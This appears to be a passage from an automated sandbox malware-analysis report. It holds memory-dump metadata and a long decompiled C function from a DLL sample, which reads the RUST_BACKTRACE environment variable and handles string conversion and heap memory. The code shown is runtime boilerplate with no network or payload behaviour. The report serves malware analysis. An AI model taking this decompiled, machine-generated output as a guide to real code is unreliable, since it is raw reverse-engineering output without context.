                                                                                                                                                                                      0x003eab3e
                                                                                                                                                                                      0x003eab41
                                                                                                                                                                                      0x003eab41
                                                                                                                                                                                      0x003eaaca
                                                                                                                                                                                      0x003eaaca
                                                                                                                                                                                      0x003eaaca
                                                                                                                                                                                      0x003eab43
                                                                                                                                                                                      0x003eab45
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003eab45
                                                                                                                                                                                      0x003eaa8b
                                                                                                                                                                                      0x003eaa91
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003eaa9b
                                                                                                                                                                                      0x003eaaa0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003eae10
                                                                                                                                                                                      0x003eae10
                                                                                                                                                                                      0x003eae10
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: qM0$&\b$&\b$&]^$*p$,H<$8YNn$@0$Ao$CK$]p$fM6$jo$l?U$ll$oC.$td$u+J$u+J$u+J$~/$;$~c$[$q
                                                                                                                                                                                      • API String ID: 0-640385374
                                                                                                                                                                                      • Opcode ID: e664d3b569dbe5ee0da2f0b9f9fc05a0a68dda603322bc1cfc91136a1c643e17
                                                                                                                                                                                      • Instruction ID: 5ff545901f95be93795beca83c76305bb9eea116f128e2962345ea340a9d1d38
                                                                                                                                                                                      • Opcode Fuzzy Hash: e664d3b569dbe5ee0da2f0b9f9fc05a0a68dda603322bc1cfc91136a1c643e17
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD222719087908BD379CF25C58A7DBBBE1BBC5304F108A1DE5D99A2A0DBB09949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                      			E6E9DD380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
                                                                                                                                                                                      				long _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				long _v40;
                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                      				void* _v48;
                                                                                                                                                                                      				long _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				void* _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				void* _v72;
                                                                                                                                                                                      				long* _v76;
                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                      				signed int _v1096;
                                                                                                                                                                                      				long _v1100;
                                                                                                                                                                                      				void* _v1104;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                      				void* _t143;
                                                                                                                                                                                      				void* _t148;
                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                      				intOrPtr _t151;
                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                      				signed int _t160;
                                                                                                                                                                                      				void** _t161;
                                                                                                                                                                                      				void* _t167;
                                                                                                                                                                                      				long _t171;
                                                                                                                                                                                      				signed int _t172;
                                                                                                                                                                                      				long _t173;
                                                                                                                                                                                      				void* _t179;
                                                                                                                                                                                      				void* _t181;
                                                                                                                                                                                      				long _t194;
                                                                                                                                                                                      				signed int _t195;
                                                                                                                                                                                      				signed char _t196;
                                                                                                                                                                                      				signed int _t199;
                                                                                                                                                                                      				signed int _t200;
                                                                                                                                                                                      				signed int _t211;
                                                                                                                                                                                      				signed int _t213;
                                                                                                                                                                                      				signed int _t214;
                                                                                                                                                                                      				void* _t218;
                                                                                                                                                                                      				intOrPtr _t220;
                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                      				intOrPtr* _t224;
                                                                                                                                                                                      				intOrPtr _t226;
                                                                                                                                                                                      				signed int _t228;
                                                                                                                                                                                      				char* _t229;
                                                                                                                                                                                      				signed int _t230;
                                                                                                                                                                                      				signed int _t232;
                                                                                                                                                                                      				signed int _t238;
                                                                                                                                                                                      				signed int _t241;
                                                                                                                                                                                      				signed int _t242;
                                                                                                                                                                                      				WCHAR* _t247;
                                                                                                                                                                                      				long _t248;
                                                                                                                                                                                      				signed int _t249;
                                                                                                                                                                                      				signed int _t252;
                                                                                                                                                                                      				char* _t264;
                                                                                                                                                                                      				void* _t265;
                                                                                                                                                                                      				void* _t267;
                                                                                                                                                                                      				void* _t268;
                                                                                                                                                                                      				signed char* _t273;
                                                                                                                                                                                      				signed int _t274;
                                                                                                                                                                                      				void* _t280;
                                                                                                                                                                                      				intOrPtr _t281;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t262 = __esi;
                                                                                                                                                                                      				_t245 = __edi;
                                                                                                                                                                                      				_t192 = __ebx;
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_t281 = _t280 - 0x440;
                                                                                                                                                                                      				_v32 = _t281;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E39D0;
                                                                                                                                                                                      				_v76 = __ecx;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				_t142 =  *0x6ea2e128; // 0x720000
                                                                                                                                                                                      				if(_t142 != 0) {
                                                                                                                                                                                      					L3:
                                                                                                                                                                                      					_t143 = HeapAlloc(_t142, 0, 0xa);
                                                                                                                                                                                      					if(_t143 == 0) {
                                                                                                                                                                                      						goto L94;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t264 = "UST_BACKTRACE";
                                                                                                                                                                                      						_t241 = 1;
                                                                                                                                                                                      						_t211 = 0;
                                                                                                                                                                                      						 *_t143 = 0x52;
                                                                                                                                                                                      						_v1104 = _t143;
                                                                                                                                                                                      						_v1100 = 5;
                                                                                                                                                                                      						_v1096 = 1;
                                                                                                                                                                                      						_v44 = 0;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							_v36 = _t211;
                                                                                                                                                                                      							if(_t211 == 0) {
                                                                                                                                                                                      								goto L10;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v44 = 0;
                                                                                                                                                                                      							_t211 = 0;
                                                                                                                                                                                      							if(_t241 != _v1100) {
                                                                                                                                                                                      								L6:
                                                                                                                                                                                      								_t245 = _v36;
                                                                                                                                                                                      								 *((short*)(_t143 + _t241 * 2)) = _v36;
                                                                                                                                                                                      								_t241 = _t241 + 1;
                                                                                                                                                                                      								_v1096 = _t241;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L13:
                                                                                                                                                                                      								_v40 = _t264;
                                                                                                                                                                                      								_v20 = 0;
                                                                                                                                                                                      								_v48 = _t241;
                                                                                                                                                                                      								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
                                                                                                                                                                                      								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
                                                                                                                                                                                      								asm("sbb eax, 0x0");
                                                                                                                                                                                      								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
                                                                                                                                                                                      								E6E9F9A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
                                                                                                                                                                                      								_t281 = _t281 + 4;
                                                                                                                                                                                      								_t143 = _v1104;
                                                                                                                                                                                      								_t241 = _v48;
                                                                                                                                                                                      								_t264 = _v40;
                                                                                                                                                                                      								_t211 = _v44;
                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L10:
                                                                                                                                                                                      							__eflags = _t264 - 0x6ea1face;
                                                                                                                                                                                      							if(_t264 != 0x6ea1face) {
                                                                                                                                                                                      								_t196 =  *_t264 & 0x000000ff;
                                                                                                                                                                                      								_t229 =  &(_t264[1]);
                                                                                                                                                                                      								_t249 = _t196 & 0x000000ff;
                                                                                                                                                                                      								__eflags = _t196;
                                                                                                                                                                                      								if(_t196 < 0) {
                                                                                                                                                                                      									_v36 = _t249 & 0x0000001f;
                                                                                                                                                                                      									__eflags = _t229 - 0x6ea1face;
                                                                                                                                                                                      									if(_t229 == 0x6ea1face) {
                                                                                                                                                                                      										_t230 = 0;
                                                                                                                                                                                      										__eflags = _t196 - 0xdf;
                                                                                                                                                                                      										_t252 = 0;
                                                                                                                                                                                      										_v40 = 0x6ea1face;
                                                                                                                                                                                      										if(_t196 > 0xdf) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_v36 = _v36 << 6;
                                                                                                                                                                                      											_t264 = 0x6ea1face;
                                                                                                                                                                                      											_t211 = 0;
                                                                                                                                                                                      											__eflags = _t241 - _v1100;
                                                                                                                                                                                      											if(_t241 != _v1100) {
                                                                                                                                                                                      												goto L6;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L13;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t238 = _t264[1] & 0x000000ff;
                                                                                                                                                                                      										_t264 =  &(_t264[2]);
                                                                                                                                                                                      										_t230 = _t238 & 0x0000003f;
                                                                                                                                                                                      										__eflags = _t196 - 0xdf;
                                                                                                                                                                                      										if(_t196 <= 0xdf) {
                                                                                                                                                                                      											_t199 = _v36 << 0x00000006 | _t230;
                                                                                                                                                                                      											__eflags = _t199 - 0xffff;
                                                                                                                                                                                      											if(_t199 > 0xffff) {
                                                                                                                                                                                      												goto L32;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L22;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__eflags = _t264 - 0x6ea1face;
                                                                                                                                                                                      											if(_t264 == 0x6ea1face) {
                                                                                                                                                                                      												_t252 = 0;
                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                      												_v40 = 0x6ea1face;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_v40 =  &(_t264[1]);
                                                                                                                                                                                      												_t252 =  *_t264 & 0x3f;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L25:
                                                                                                                                                                                      											_t232 = _t230 << 0x00000006 | _t252;
                                                                                                                                                                                      											__eflags = _t196 - 0xf0;
                                                                                                                                                                                      											if(_t196 < 0xf0) {
                                                                                                                                                                                      												_t199 = _v36 << 0x0000000c | _t232;
                                                                                                                                                                                      												_t264 = _v40;
                                                                                                                                                                                      												__eflags = _t199 - 0xffff;
                                                                                                                                                                                      												if(_t199 > 0xffff) {
                                                                                                                                                                                      													goto L32;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L22;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t273 = _v40;
                                                                                                                                                                                      												__eflags = _t273 - 0x6ea1face;
                                                                                                                                                                                      												if(_t273 == 0x6ea1face) {
                                                                                                                                                                                      													_t274 = 0;
                                                                                                                                                                                      													__eflags = 0;
                                                                                                                                                                                      													_v40 = 0x6ea1face;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_v40 =  &(_t273[1]);
                                                                                                                                                                                      													_t274 =  *_t273 & 0x3f;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
                                                                                                                                                                                      												_t264 = _v40;
                                                                                                                                                                                      												__eflags = _t199 - 0xffff;
                                                                                                                                                                                      												if(_t199 <= 0xffff) {
                                                                                                                                                                                      													L22:
                                                                                                                                                                                      													_v36 = _t199;
                                                                                                                                                                                      													_t211 = 0;
                                                                                                                                                                                      													__eflags = _t241 - _v1100;
                                                                                                                                                                                      													if(_t241 != _v1100) {
                                                                                                                                                                                      														goto L6;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L13;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													L32:
                                                                                                                                                                                      													_t200 = _t199 + 0xffff0000;
                                                                                                                                                                                      													_v40 = _t264;
                                                                                                                                                                                      													_v36 = _t200 >> 0x0000000a | 0x0000d800;
                                                                                                                                                                                      													_t264 = _v40;
                                                                                                                                                                                      													_t211 = _t200 & 0x000003ff | 0x0000dc00;
                                                                                                                                                                                      													_v44 = _t211;
                                                                                                                                                                                      													__eflags = _t241 - _v1100;
                                                                                                                                                                                      													if(_t241 != _v1100) {
                                                                                                                                                                                      														goto L6;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L13;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t264 = _t229;
                                                                                                                                                                                      									_v36 = _t249;
                                                                                                                                                                                      									_t211 = 0;
                                                                                                                                                                                      									__eflags = _t241 - _v1100;
                                                                                                                                                                                      									if(_t241 != _v1100) {
                                                                                                                                                                                      										goto L6;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L13;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L96;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t242 = _v1096;
                                                                                                                                                                                      							asm("movsd xmm0, [ebp-0x44c]");
                                                                                                                                                                                      							_v64 = _t242;
                                                                                                                                                                                      							asm("movsd [ebp-0x44], xmm0");
                                                                                                                                                                                      							__eflags = _t242 - 8;
                                                                                                                                                                                      							_t213 = _t242;
                                                                                                                                                                                      							_t148 = _v72;
                                                                                                                                                                                      							_t265 = _t148;
                                                                                                                                                                                      							if(_t242 < 8) {
                                                                                                                                                                                      								L45:
                                                                                                                                                                                      								_t214 = _t213 + _t213;
                                                                                                                                                                                      								asm("o16 nop [cs:eax+eax]");
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									__eflags = _t214;
                                                                                                                                                                                      									if(_t214 == 0) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t214 = _t214 + 0xfffffffe;
                                                                                                                                                                                      									__eflags =  *_t265;
                                                                                                                                                                                      									_t265 = _t265 + 2;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L48;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L96;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t242 - _v68;
                                                                                                                                                                                      								if(_t242 == _v68) {
                                                                                                                                                                                      									_v20 = 1;
                                                                                                                                                                                      									E6E9F9A30( &_v72, _t242, 1);
                                                                                                                                                                                      									_t281 = _t281 + 4;
                                                                                                                                                                                      									_t148 = _v72;
                                                                                                                                                                                      									_t242 = _v64;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *((short*)(_t148 + _t242 * 2)) = 0;
                                                                                                                                                                                      								asm("movsd xmm0, [ebp-0x44]");
                                                                                                                                                                                      								asm("movsd [ebp-0x38], xmm0");
                                                                                                                                                                                      								_t149 = _v60;
                                                                                                                                                                                      								__eflags = _t149;
                                                                                                                                                                                      								_v36 = _t149;
                                                                                                                                                                                      								if(_t149 == 0) {
                                                                                                                                                                                      									goto L75;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_v80 = _v56;
                                                                                                                                                                                      									E6E9EE9D0(_t245,  &_v1104, 0, 0x400);
                                                                                                                                                                                      									_t281 = _t281 + 0xc;
                                                                                                                                                                                      									_t155 =  *0x6ea1f8cc; // 0x2
                                                                                                                                                                                      									_t194 = 0x200;
                                                                                                                                                                                      									_t262 = 0;
                                                                                                                                                                                      									_v60 = _t155;
                                                                                                                                                                                      									_v56 = 0;
                                                                                                                                                                                      									_v48 = _t155;
                                                                                                                                                                                      									_v52 = 0;
                                                                                                                                                                                      									__eflags = 0x200 - 0x201;
                                                                                                                                                                                      									if(0x200 >= 0x201) {
                                                                                                                                                                                      										L65:
                                                                                                                                                                                      										_t157 = _t194 - _t262;
                                                                                                                                                                                      										__eflags = _v56 - _t262 - _t157;
                                                                                                                                                                                      										if(_v56 - _t262 < _t157) {
                                                                                                                                                                                      											_v44 = _t194;
                                                                                                                                                                                      											_v20 = 5;
                                                                                                                                                                                      											E6E9F9A30( &_v60, _t262, _t157);
                                                                                                                                                                                      											_t281 = _t281 + 4;
                                                                                                                                                                                      											_t194 = _v44;
                                                                                                                                                                                      											_v48 = _v60;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t247 = _v48;
                                                                                                                                                                                      										_t262 = _t194;
                                                                                                                                                                                      										_v52 = _t194;
                                                                                                                                                                                      										_v40 = _t194;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										L68:
                                                                                                                                                                                      										_t247 =  &_v1104;
                                                                                                                                                                                      										_v40 = 0x200;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L69:
                                                                                                                                                                                      									_v44 = _t247;
                                                                                                                                                                                      									SetLastError(0);
                                                                                                                                                                                      									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
                                                                                                                                                                                      									_t245 = _t158;
                                                                                                                                                                                      									__eflags = _t158;
                                                                                                                                                                                      									if(_t158 != 0) {
                                                                                                                                                                                      										L71:
                                                                                                                                                                                      										__eflags = _t245 - _t194;
                                                                                                                                                                                      										if(_t245 != _t194) {
                                                                                                                                                                                      											L63:
                                                                                                                                                                                      											__eflags = _t245 - _t194;
                                                                                                                                                                                      											_t192 = _t245;
                                                                                                                                                                                      											if(_t245 < _t194) {
                                                                                                                                                                                      												_t239 = _v40;
                                                                                                                                                                                      												_v20 = 5;
                                                                                                                                                                                      												__eflags = _t245 - _v40;
                                                                                                                                                                                      												if(__eflags > 0) {
                                                                                                                                                                                      													goto L95;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_push(_t245);
                                                                                                                                                                                      													E6E9E0D10(_t192,  &_v72, _v44, _t245, _t262);
                                                                                                                                                                                      													_t281 = _t281 + 4;
                                                                                                                                                                                      													_t218 = _v72;
                                                                                                                                                                                      													_t248 = _v68;
                                                                                                                                                                                      													_t262 = _v64;
                                                                                                                                                                                      													_t195 = 0;
                                                                                                                                                                                      													_t160 = _v56;
                                                                                                                                                                                      													__eflags = _t160;
                                                                                                                                                                                      													if(_t160 != 0) {
                                                                                                                                                                                      														goto L81;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      													}
                                                                                                                                                                                      													goto L84;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags = _t192 - 0x201;
                                                                                                                                                                                      												if(_t192 < 0x201) {
                                                                                                                                                                                      													goto L68;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L65;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L69;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t171 = GetLastError();
                                                                                                                                                                                      											__eflags = _t171 - 0x7a;
                                                                                                                                                                                      											if(_t171 != 0x7a) {
                                                                                                                                                                                      												goto L63;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t194 = _t194 + _t194;
                                                                                                                                                                                      												__eflags = _t194 - 0x201;
                                                                                                                                                                                      												if(_t194 < 0x201) {
                                                                                                                                                                                      													goto L68;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L65;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L69;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t172 = GetLastError();
                                                                                                                                                                                      										__eflags = _t172;
                                                                                                                                                                                      										if(_t172 != 0) {
                                                                                                                                                                                      											_t195 = 1;
                                                                                                                                                                                      											_t173 = GetLastError();
                                                                                                                                                                                      											_t218 = 0;
                                                                                                                                                                                      											_t248 = _t173;
                                                                                                                                                                                      											_t160 = _v56;
                                                                                                                                                                                      											__eflags = _t160;
                                                                                                                                                                                      											if(_t160 != 0) {
                                                                                                                                                                                      												L81:
                                                                                                                                                                                      												__eflags = _v48;
                                                                                                                                                                                      												if(_v48 != 0) {
                                                                                                                                                                                      													__eflags = _t160 & 0x7fffffff;
                                                                                                                                                                                      													if((_t160 & 0x7fffffff) != 0) {
                                                                                                                                                                                      														_v44 = _t218;
                                                                                                                                                                                      														HeapFree( *0x6ea2e128, 0, _v48);
                                                                                                                                                                                      														_t218 = _v44;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L84:
                                                                                                                                                                                      											__eflags = _t195;
                                                                                                                                                                                      											if(_t195 == 0) {
                                                                                                                                                                                      												_t161 = _v76;
                                                                                                                                                                                      												 *_t161 = _t218;
                                                                                                                                                                                      												_t161[1] = _t248;
                                                                                                                                                                                      												_t161[2] = _t262;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags = _t218 - 3;
                                                                                                                                                                                      												 *_v76 = 0;
                                                                                                                                                                                      												if(_t218 == 3) {
                                                                                                                                                                                      													_v20 = 4;
                                                                                                                                                                                      													_v44 = _t248;
                                                                                                                                                                                      													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
                                                                                                                                                                                      													_t281 = _t281 + 4;
                                                                                                                                                                                      													_t267 = _v44;
                                                                                                                                                                                      													_t220 =  *((intOrPtr*)(_t267 + 4));
                                                                                                                                                                                      													__eflags =  *(_t220 + 4);
                                                                                                                                                                                      													if( *(_t220 + 4) != 0) {
                                                                                                                                                                                      														_t167 =  *_t267;
                                                                                                                                                                                      														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
                                                                                                                                                                                      														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
                                                                                                                                                                                      															_t167 =  *(_t167 - 4);
                                                                                                                                                                                      														}
                                                                                                                                                                                      														HeapFree( *0x6ea2e128, 0, _t167);
                                                                                                                                                                                      													}
                                                                                                                                                                                      													HeapFree( *0x6ea2e128, 0, _t267);
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = _v80 & 0x7fffffff;
                                                                                                                                                                                      											if((_v80 & 0x7fffffff) != 0) {
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _v36);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L76;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											goto L71;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t228 = _t242;
                                                                                                                                                                                      								_t268 = _t148;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									__eflags =  *_t268;
                                                                                                                                                                                      									if( *_t268 == 0) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *((short*)(_t268 + 2));
                                                                                                                                                                                      									if( *((short*)(_t268 + 2)) == 0) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										__eflags =  *((short*)(_t268 + 4));
                                                                                                                                                                                      										if( *((short*)(_t268 + 4)) == 0) {
                                                                                                                                                                                      											break;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__eflags =  *((short*)(_t268 + 6));
                                                                                                                                                                                      											if( *((short*)(_t268 + 6)) == 0) {
                                                                                                                                                                                      												break;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags =  *((short*)(_t268 + 8));
                                                                                                                                                                                      												if( *((short*)(_t268 + 8)) == 0) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eflags =  *((short*)(_t268 + 0xa));
                                                                                                                                                                                      													if( *((short*)(_t268 + 0xa)) == 0) {
                                                                                                                                                                                      														break;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														__eflags =  *((short*)(_t268 + 0xc));
                                                                                                                                                                                      														if( *((short*)(_t268 + 0xc)) == 0) {
                                                                                                                                                                                      															break;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															__eflags =  *((short*)(_t268 + 0xe));
                                                                                                                                                                                      															if( *((short*)(_t268 + 0xe)) == 0) {
                                                                                                                                                                                      																break;
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																_t228 = _t228 + 0xfffffff8;
                                                                                                                                                                                      																_t268 = _t268 + 0x10;
                                                                                                                                                                                      																__eflags = _t228 - 7;
                                                                                                                                                                                      																if(_t228 > 7) {
                                                                                                                                                                                      																	continue;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	goto L45;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															}
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L96;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L48:
                                                                                                                                                                                      								_t223 = _v68;
                                                                                                                                                                                      								_v56 = 0x6ea206d8;
                                                                                                                                                                                      								_v60 = 0x1402;
                                                                                                                                                                                      								__eflags = _t223;
                                                                                                                                                                                      								if(_t223 != 0) {
                                                                                                                                                                                      									__eflags = _t148;
                                                                                                                                                                                      									if(_t148 != 0) {
                                                                                                                                                                                      										__eflags = _t223 & 0x7fffffff;
                                                                                                                                                                                      										if((_t223 & 0x7fffffff) != 0) {
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t148);
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _v60 - 3;
                                                                                                                                                                                      								if(_v60 == 3) {
                                                                                                                                                                                      									_t224 = _v56;
                                                                                                                                                                                      									_v36 = _t224;
                                                                                                                                                                                      									_t70 = _t224 + 4; // 0x2c
                                                                                                                                                                                      									_v20 = 2;
                                                                                                                                                                                      									 *((intOrPtr*)( *_t70))( *_t224);
                                                                                                                                                                                      									_t281 = _t281 + 4;
                                                                                                                                                                                      									_t179 = _v36;
                                                                                                                                                                                      									_t226 =  *((intOrPtr*)(_t179 + 4));
                                                                                                                                                                                      									__eflags =  *(_t226 + 4);
                                                                                                                                                                                      									if( *(_t226 + 4) != 0) {
                                                                                                                                                                                      										_t181 =  *_t179;
                                                                                                                                                                                      										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
                                                                                                                                                                                      										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
                                                                                                                                                                                      											_t181 =  *(_t181 - 4);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										HeapFree( *0x6ea2e128, 0, _t181);
                                                                                                                                                                                      										_t179 = _v56;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									HeapFree( *0x6ea2e128, 0, _t179);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L75:
                                                                                                                                                                                      								 *_v76 = 0;
                                                                                                                                                                                      								L76:
                                                                                                                                                                                      								_t151 = _v28;
                                                                                                                                                                                      								 *[fs:0x0] = _t151;
                                                                                                                                                                                      								return _t151;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L96;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t142 = GetProcessHeap();
                                                                                                                                                                                      					if(_t142 == 0) {
                                                                                                                                                                                      						L94:
                                                                                                                                                                                      						_t239 = 2;
                                                                                                                                                                                      						E6E9F92F0(_t192, 0xa, 2, _t245, _t262, __eflags);
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						L95:
                                                                                                                                                                                      						E6E9F9470(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ea206e0);
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						__eflags =  &_a8;
                                                                                                                                                                                      						E6E9D48D0( *_v44,  *((intOrPtr*)(_v44 + 4)));
                                                                                                                                                                                      						return E6E9DD270(_t263);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *0x6ea2e128 = _t142;
                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L96:
                                                                                                                                                                                      			}







































































                                                                                                                                                                                      0x6e9dd380
                                                                                                                                                                                      0x6e9dd380
                                                                                                                                                                                      0x6e9dd380
                                                                                                                                                                                      0x6e9dd383
                                                                                                                                                                                      0x6e9dd384
                                                                                                                                                                                      0x6e9dd385
                                                                                                                                                                                      0x6e9dd386
                                                                                                                                                                                      0x6e9dd38c
                                                                                                                                                                                      0x6e9dd38f
                                                                                                                                                                                      0x6e9dd396
                                                                                                                                                                                      0x6e9dd39d
                                                                                                                                                                                      0x6e9dd3aa
                                                                                                                                                                                      0x6e9dd3ad
                                                                                                                                                                                      0x6e9dd3b3
                                                                                                                                                                                      0x6e9dd3ba
                                                                                                                                                                                      0x6e9dd3ce
                                                                                                                                                                                      0x6e9dd3d3
                                                                                                                                                                                      0x6e9dd3da
                                                                                                                                                                                      0x00000000
